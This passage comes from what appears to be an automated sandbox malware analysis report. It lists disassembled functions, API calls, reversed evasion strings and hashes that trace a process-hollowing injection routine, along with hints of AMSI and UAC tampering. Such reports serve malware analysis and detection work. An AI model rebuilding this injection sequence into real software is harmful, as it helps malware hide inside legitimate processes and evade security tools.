                                                                                                                                          • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryMemoryThreadVirtual$AddressContextFreeProc$AllocateCreateHandleLoadModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 59011937-51457883
                                                                                                                                        • Opcode ID: 1dd0aeef37e5fe6e08d09b999f67093b271a466cfea6b52a39ddfedb79af3998
                                                                                                                                        • Instruction ID: 98c7717d0e88852f3a0a27776c85a39387f2096e78ac0de55dc7b2b4446f68b9
                                                                                                                                        • Opcode Fuzzy Hash: 1dd0aeef37e5fe6e08d09b999f67093b271a466cfea6b52a39ddfedb79af3998
                                                                                                                                        • Instruction Fuzzy Hash: E8E20C35AD01699FDB11EB64CD91ADE73FAAF45310F10E1B1B00AAB354DA30AE89CF54
                                                                                                                                        Function 02E28BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 7653 2e28ba6-2e28bab 7655 2e28bb0-2e28bb5 7653->7655 7655->7655 7656 2e28bb7-2e28c9e call 2e1493c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 7655->7656 7687 2e28ca4-2e28d7f call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 7656->7687 7688 2e2a6ef-2e2a759 call 2e144d0 * 2 call 2e14c0c call 2e144d0 call 2e144ac call 2e144d0 * 2 7656->7688 7687->7688 7731 2e28d85-2e290ad call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e130d4 * 2 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14d8c call 2e14d9c call 2e285d4 7687->7731 7840 2e29120-2e29441 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e12ee0 call 2e12f08 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c GetThreadContext 7731->7840 7841 2e290af-2e2911b call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 7731->7841 7840->7688 7949 2e29447-2e296aa call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e2824c 7840->7949 7841->7840 8022 2e296b0-2e29819 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e284bc 7949->8022 8023 2e299b7-2e29a22 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 7949->8023 8114 2e29843-2e298ae call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 8022->8114 8115 2e2981b-2e29841 call 2e279ac 8022->8115 8048 2e29a28-2e29ba8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e279ac 8023->8048 8049 2e29a23 call 2e2881c 8023->8049 8048->7688 8154 2e29bae-2e29ca7 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e28ab8 8048->8154 8049->8048 8122 2e298b4-2e299b5 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e279ac 8114->8122 8152 2e298af call 2e2881c 8114->8152 8115->8122 8122->8048 8152->8122 8205 2e29cfb-2e2a6ea call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27cf8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27cf8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c SetThreadContext NtResumeThread call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e12c2c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e28798 * 3 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e28798 * 2 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 * 5 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e27ecc call 2e28798 * 2 8154->8205 8206 2e29ca9-2e29cf6 call 2e289b0 call 2e289a4 8154->8206 8205->7688 8206->8205
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                          • Part of subcall function 02E285D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E28660
                                                                                                                                        • GetThreadContext.KERNEL32(02E713D0,02E71420,ScanString,02E713A4,02E2A774,UacInitialize,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,UacInitialize,02E713A4), ref: 02E2943A
                                                                                                                                          • Part of subcall function 02E2824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
                                                                                                                                          • Part of subcall function 02E284BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
                                                                                                                                          • Part of subcall function 02E279AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryVirtual$AddressAllocateContextCreateFreeHandleLibraryModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 1291004003-51457883
                                                                                                                                        • Opcode ID: a34dbf8257b169a1fa7e2df190d608e36f8edd0216237356113b6b6bbb5ae6b9
                                                                                                                                        • Instruction ID: 831b16bb12cb97f8e49f54942aebeae362ef25f2a050226ef551f172ee4605b3
                                                                                                                                        • Opcode Fuzzy Hash: a34dbf8257b169a1fa7e2df190d608e36f8edd0216237356113b6b6bbb5ae6b9
                                                                                                                                        • Instruction Fuzzy Hash: 73E21C35AD01699FDB11EB64CD91ADE73FAAF45310F10E1B1B00AAB354DA30AE89CF54
                                                                                                                                        Function 02E15A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8509 2e15a78-2e15ab9 GetModuleFileNameA RegOpenKeyExA 8510 2e15afb-2e15b3e call 2e158b4 RegQueryValueExA 8509->8510 8511 2e15abb-2e15ad7 RegOpenKeyExA 8509->8511 8516 2e15b40-2e15b5c RegQueryValueExA 8510->8516 8517 2e15b62-2e15b7c RegCloseKey 8510->8517 8511->8510 8512 2e15ad9-2e15af5 RegOpenKeyExA 8511->8512 8512->8510 8514 2e15b84-2e15bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8512->8514 8518 2e15bbb-2e15bbf 8514->8518 8519 2e15c9e-2e15ca5 8514->8519 8516->8517 8520 2e15b5e 8516->8520 8521 2e15bc1-2e15bc5 8518->8521 8522 2e15bcb-2e15be1 lstrlen 8518->8522 8520->8517 8521->8519 8521->8522 8523 2e15be4-2e15be7 8522->8523 8524 2e15bf3-2e15bfb 8523->8524 8525 2e15be9-2e15bf1 8523->8525 8524->8519 8527 2e15c01-2e15c06 8524->8527 8525->8524 8526 2e15be3 8525->8526 8526->8523 8528 2e15c30-2e15c32 8527->8528 8529 2e15c08-2e15c2e lstrcpyn LoadLibraryExA 8527->8529 8528->8519 8530 2e15c34-2e15c38 8528->8530 8529->8528 8530->8519 8531 2e15c3a-2e15c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8519 8532 2e15c6c-2e15c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8519
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02E15A94
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AB2
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AD0
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E15AEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E15B37
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02E15CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001), ref: 02E15B55
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02E15B84,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15B77
                                                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E15B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02E15BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02E15BA7
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02E15BD2
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02E15C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C29
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02E15C51
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C61
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                        • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1759228003-3917250287
                                                                                                                                        • Opcode ID: 41f75e94fb55a26f3a990ea112603149f0cc2d8c2e9d08b8adb20703b6215080
                                                                                                                                        • Instruction ID: bb5cc2be2946d4b9e3b01ee5d5239305f1020c3f82a6dcff5fa377f311f7d7d0
                                                                                                                                        • Opcode Fuzzy Hash: 41f75e94fb55a26f3a990ea112603149f0cc2d8c2e9d08b8adb20703b6215080
                                                                                                                                        • Instruction Fuzzy Hash: C1518771A8020C7EFB25DAA4CC46FEF77AD9B44744F8091B5B708EA181E7B49A44CF60
                                                                                                                                        Function 02E279AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 1888340430-445027087
                                                                                                                                        • Opcode ID: 0adc997cb0c09c2efd3210dcbc009560a22e64ee69ac7d1e0f249e26705db2d2
                                                                                                                                        • Instruction ID: ebd945c3e9eb873653f276364f24392af2ca45ed6094e973b45925953fd43513
                                                                                                                                        • Opcode Fuzzy Hash: 0adc997cb0c09c2efd3210dcbc009560a22e64ee69ac7d1e0f249e26705db2d2
                                                                                                                                        • Instruction Fuzzy Hash: 36112175690308BFEB00EFA4DC51EAEB7EDEB48710F519460B905D7640DA30AA59CB60
                                                                                                                                        Function 02E279AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 1888340430-445027087
                                                                                                                                        • Opcode ID: 808b7721f99e60617e20aab514301f85c1a6f3d8ca78fc14b4a66fa243d11cc1
                                                                                                                                        • Instruction ID: a9b03dca6d854b7a176a149af24b73a620721dac4b363d3fb6c728da96c75289
                                                                                                                                        • Opcode Fuzzy Hash: 808b7721f99e60617e20aab514301f85c1a6f3d8ca78fc14b4a66fa243d11cc1
                                                                                                                                        • Instruction Fuzzy Hash: 781144756D0308BFEB00EF94DC51EAEB7EDEB48710F51D460B905D7640DA30AA59CB60
                                                                                                                                        Function 02E2824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                        • API String ID: 36784810-737317276
                                                                                                                                        • Opcode ID: c05521f4a5e623697260cf96fe1a41a879ad9cbb2820a37d454b6ce894d9828d
                                                                                                                                        • Instruction ID: 0c9249cd1e2d404d7cbd7e39a88eae17109c8966058523b811f532b84ff58e14
                                                                                                                                        • Opcode Fuzzy Hash: c05521f4a5e623697260cf96fe1a41a879ad9cbb2820a37d454b6ce894d9828d
                                                                                                                                        • Instruction Fuzzy Hash: ED012975690308BFEB00EFA8D841EAE77EEEB49710F52D420F909D7640D670AD198B74
                                                                                                                                        Function 02E27CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleMemoryModuleVirtualWrite
                                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                        • API String ID: 1525300337-3542721025
                                                                                                                                        • Opcode ID: e75cc00427f3edcbc6795a62ac425a9ffad701f955f454e2f27441418f2b0a16
                                                                                                                                        • Instruction ID: e145c2b4d2c62c8f3b1567e9f908f4c6e7c13b635e8f7b3ee938eb70077d03d7
                                                                                                                                        • Opcode Fuzzy Hash: e75cc00427f3edcbc6795a62ac425a9ffad701f955f454e2f27441418f2b0a16
                                                                                                                                        • Instruction Fuzzy Hash: 340140746D0208BFEB00EF98D842EAEB7EDEB4E710F51D460F809D7680C630A918CB64
                                                                                                                                        Function 02E284BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                        • API String ID: 858119152-2520021413
                                                                                                                                        • Opcode ID: ab58ed5e71db49522843adc2fd6eff8a9511e0faa5e8c2d75e8f65d4522aa52a
                                                                                                                                        • Instruction ID: 5c73ed095a8adf169c01a9ee9e1170122fc754ad6e1f7182a489e31ed7619e98
                                                                                                                                        • Opcode Fuzzy Hash: ab58ed5e71db49522843adc2fd6eff8a9511e0faa5e8c2d75e8f65d4522aa52a
                                                                                                                                        • Instruction Fuzzy Hash: 1F0167746D0314BFEB00EF64DC41E5E77AEEB49710F92D460B4059B640DA34A909CA20
                                                                                                                                        Function 02E2DAC4 Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
                                                                                                                                        • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
                                                                                                                                        • NtClose.NTDLL(?), ref: 02E2DB73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$CloseFileNameName_Write
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1792072161-0
                                                                                                                                        • Opcode ID: 6ce59a2a09d5b7a40936d0b5e679d5cb04f227f62d4d909601869c93a329a68b
                                                                                                                                        • Instruction ID: afcfb36519226fc7c2b3e830e6b2bc67cab0962f215e92a4aad06c01fe8c23c6
                                                                                                                                        • Opcode Fuzzy Hash: 6ce59a2a09d5b7a40936d0b5e679d5cb04f227f62d4d909601869c93a329a68b
                                                                                                                                        • Instruction Fuzzy Hash: 4B21FF71A80359BAEB10EAE4CC52FDEB7BDEB04B04F609471B605F71C0D7B0AE048A65
                                                                                                                                        Function 02E2D9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1459852867-0
                                                                                                                                        • Opcode ID: 2761b2eb94208179999a5555419cced18572b9503af36920c5002c931c0c0520
                                                                                                                                        • Instruction ID: b9674dbd3f3512df930de0f02ad2ccce49f1b2d66a733a28640d95a343b81d80
                                                                                                                                        • Opcode Fuzzy Hash: 2761b2eb94208179999a5555419cced18572b9503af36920c5002c931c0c0520
                                                                                                                                        • Instruction Fuzzy Hash: 32014FB59883486EEF05E6A08D41FCD77B9AB44704F5090A2A302E6181DA74AB0CCB21
                                                                                                                                        Function 02E2DA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                          • Part of subcall function 02E14C0C: SysFreeString.OLEAUT32(?), ref: 02E14C1A
                                                                                                                                        Memory Dump Source
